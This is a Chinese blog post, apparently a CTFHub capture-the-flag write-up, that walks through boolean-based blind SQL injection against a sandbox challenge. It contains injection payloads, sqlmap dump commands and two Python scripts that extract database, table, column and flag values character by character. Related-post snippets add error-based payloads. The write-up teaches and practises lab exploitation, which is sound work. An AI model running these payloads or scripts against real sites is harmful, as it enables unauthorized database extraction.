CTFHUB-技能树-Web题-SQL注入-布尔盲注

已于 2024-05-09 21:14:47 修改
阅读量1k 收藏 14
点赞数 8
CC 4.0 BY-SA版权
分类专栏: CTFHUB解题思路 文章标签: 前端 sql 数据库
于 2024-04-02 22:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Static______/article/details/137293736
本文介绍了布尔盲注攻击方法,涉及MySQL知识点,如unionselect、database()函数、version()等,展示了如何通过SQL注入来判断注入点、检测数据库名长度和猜测数据库名,以及使用python脚本和sqlmap工具进行攻击和数据提取的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

技能树-Web题-SQL注入-布尔盲注

文章目录

布尔盲注
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
判断注入点

利用返回yes或no进行判断注入

输入1 (也可输入1 and 1=1)返回 query_success

在这里插入图片描述

输入1’ (也可输入1 and 1=2)返回query_error
在这里插入图片描述

说明存在注入点

判断数据库名长度

发现1 and length(database()) >=1 正确
1 and length(database()) >=5 错误
1 and length(database()) >=4正确

所以判断当前数据库长度为4

猜数据库名

由于返回值是正确或错误,寻常and 后面布尔盲注语句不好使,因为它们是根据查询结果为空来判断。
这时候想到用if语句

if(expr1,expr2,expr3),如果expr1的值为true,则执行expr2语句,如果expr1的值为false,则执行expr3语句。

于是要确定数据库名字,利用语句:

if(substr(database(),1,1)='s',1,(select table_name from information_schema.tables))

if(substr(database(),1,1)='a',1,(select table_name from information_schema.tables))

1 and substr(database(),1,1)='s'

1 and substr(database(),1,1)='a'

要一个一个判断有点难,可以用python脚本

也可以利用sqlmap来跑

sqlmap

爆表

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs

找flag

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

然后脱库

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump
python代码
import requests
import time

urlOPEN = 'http://challenge-80bbba4d1e9ce716.sandbox.ctfhub.com:10080/?id='
starOperatorTime = [] 
mark = 'query_success'

def database_name():
	name = ''
	for j in range(1,9):
		for i in 'sqcwertyuioplkjhgfdazxvbnm':
			url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
			# print(url+'%23')
			r = requests.get(url)
			if mark in r.text:
				name = name+i
				

				print(name)
				
				break
	print('database_name:',name)

	
database_name()

def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
			    # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)

#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))

def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=''
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)

column_name()

def get_data():
        name=''
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()

在这里插入图片描述
在这里插入图片描述

第二个

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
session=requests.session()
url = "http://challenge-230a3ccdd5ccd1a7.sandbox.ctfhub.com:10800/?id="
name = ""

# for k in range(1,10):
#     for i in range(1,10):
#         print(i)
#         for j in range(31,128):
#             j = (128+31) -j
#             str_ascii=chr(j)
#             #数据库名
#             #payolad = "if(substr(database(),%s,1) = '%s',1,(select table_name from information_schema.tables))"%(str(i),str(str_ascii))
#             #表名
#             #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,i,str(str_ascii))
#             #字段名
#             payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str(str_ascii))
#             str_get = session.get(url=url + payolad).text
#             if "query_success" in str_get:
#                 if str_ascii=="+":
#                    sys.exit()
#                 else:
#                     name+=str_ascii
#                     break
#         print(name)

#查询字段内容
for i in range(1,50):
    print(i)
    for j in range(31,128):
        j = (128+31) -j
        str_ascii=chr(j)
        payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str_ascii)
        str_get = session.get(url=url + payolad).text
        if "query_success" in str_get:
            if str_ascii == "+":
                sys.exit()
            else:
                name += str_ascii
                break
    print(name)

在这里插入图片描述

ctfhub-sql注入
Sean_summer的博客
05-03 444
叫我们输入一个1来试试输入2看看再输入2-1看是字符型还是数字型因为结果的id=1,所以是数字型注入然后我们查看字段数,传入id=1 order by 4无显示一直减小直到2才有显示,说明字段数是2传入-1 union select 1,2得到回显位再传入-1 union select 1,database()得到库名查表名查列名查信息。
CTFhub布尔盲注
ndjnddjxn的博客
04-12 1554
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
ctfhub-sql布尔盲注
god_001的博客
06-01 843
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFhub 报错注入
plant1234的博客
06-16 300
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
ctfhub-报错注入
m0_62094846的博客
12-22 484
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 1164
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
CTFHub(报错注入
sGanYu
07-24 1947
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 970
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHub (web-SQL-布尔盲注sqlmap)
m0_64444909的博客
05-09 916
一、关于sqlmap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7884
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1017
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1399
CTFHUB-WEB-SQL注入
CTFHUB技能树SQL——布尔盲注
weixin_73049307的博客
10-16 1565
显示查询成功但没有回显出相关信息,初步判断是布尔盲注入、时间盲注或报错注入。还是没有回显,到这里已经可以确认是布尔盲注了,且是整数型注入。第一个字符是"f",后续就不多描述了,是flag表。第一个字符是"f",后续就不多描述了,是flag列。后续流程实在是太长了,就直接用sqlmap直接爆了。这里为了节省时间就直接爆第二个表的字符了。说明第一个字符是115,对应字符's'(因为知道是news表和flag表)(4)爆字段内容(flag)查询成功,说明表有两个。说明第一个字符是"c"得到数据库名长度是4。
CTFHub - 报错注入
Have_a_great_day的博客
09-09 1290
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2802
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CTFHUB(WEB) 报错注入
qq_54929891的博客
09-17 439
在经历了整数型注入和数字注入后自信满满的打开了报错注入,结果不回显正确内容,只回显正确或错误的情况让我无从下手,没办法,身为小白只能继续去找资料学习一下如何做这种目了 学了一会儿,发现有很多办法,但我学的是最简单的一种办法,其他办法以后在实践中慢慢的学习 这个方法利用的是count(),rand(),floor(),group by()这几个函数的组合来利用报错信息出来我们需要查询的内容 count():返回匹配指定条件的行数。count(*)返回表中的记录数(不添加的话会出现列不对应的情况,可以试
mysql报错注入ctf_ctfhub技能树sql注入—报错注入
weixin_29350039的博客
01-27 257
打开靶机 payload1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;payload拆分讲解1 count():count()函数返回匹配指定条件的行数。count(*)函数返回表中的记录数2 floor():floor:函数是用来向下...
CTFHub 报错注入
weixin_44732566的博客
02-20 4349
CTFHub 报错注入注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
pikachusql注入布尔注入
最新发布
03-11
### Pikachu项目中的SQL布尔盲注攻击与防御 #### 攻击原理 在Pikachu靶场中,当存在SQL注入漏洞时,攻击者可以利用布尔盲注技术来逐位推断数据库的内容。由于应用程序返回页面的不同响应取决于查询条件真假,这使得攻击者能够通过一系列精心构建的SQL语句逐步获取敏感数据[^1]。 对于布尔盲注而言,在没有错误消息的情况下工作尤其有效。这意味着即使服务器不会显示具体的执行失败原因给客户端查看,只要能区分两种不同状态(如正常加载 vs 页面空白),就可以实施此类攻击[^4]。 #### 实施过程 为了演示如何进行一次简单的布尔盲注: 假设目标字段为`username`,并且已知其长度不超过8个字符,则可以通过如下方式测试每一位是否匹配特定ASCII码值: ```sql AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1), position, 1)) > guess_value -- ``` 这里的关键在于调整`position`(表示正在猜测的位置) 和 `guess_value`(尝试不同的数值直到找到符合条件的结果),并观察应用层面对应的变化情况以判断我们的推测是否正确。 #### 防御策略 针对上述提到的安全隐患,采取适当预防措施至关重要: - **参数化查询**: 使用预编译好的带占位符的SQL模板代替字符串拼接的方式构造最终要发送到DBMS上的命令文本;这样不仅提高了效率还极大增强了安全性[^3]. - **最小权限原则**: 数据库账户应该只授予必要的操作许可,减少潜在危害范围。 - **输入验证/清理**: 对所有来自外部的数据源都做严格的格式校验以及转义处理,阻止恶意代码片段混入正常的业务逻辑之中[^2]. - **启用WAF(Web Application Firewall)**: 可以为Web服务提供额外一层保护屏障,自动识别并拦截可疑请求模式下的访问行为. #### 示例代码展示安全编码实践 采用Python Flask框架为例说明怎样实现更稳健的应用程序接口设计: ```python from flask import request import sqlite3 def get_user_by_id(user_id): conn = sqlite3.connect('example.db') cursor = conn.cursor() # 参数绑定防止SQL注入风险 query = "SELECT * FROM users WHERE id=?" result = cursor.execute(query, (user_id,)) user_data = result.fetchone() conn.close() return user_data if user_data else None ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值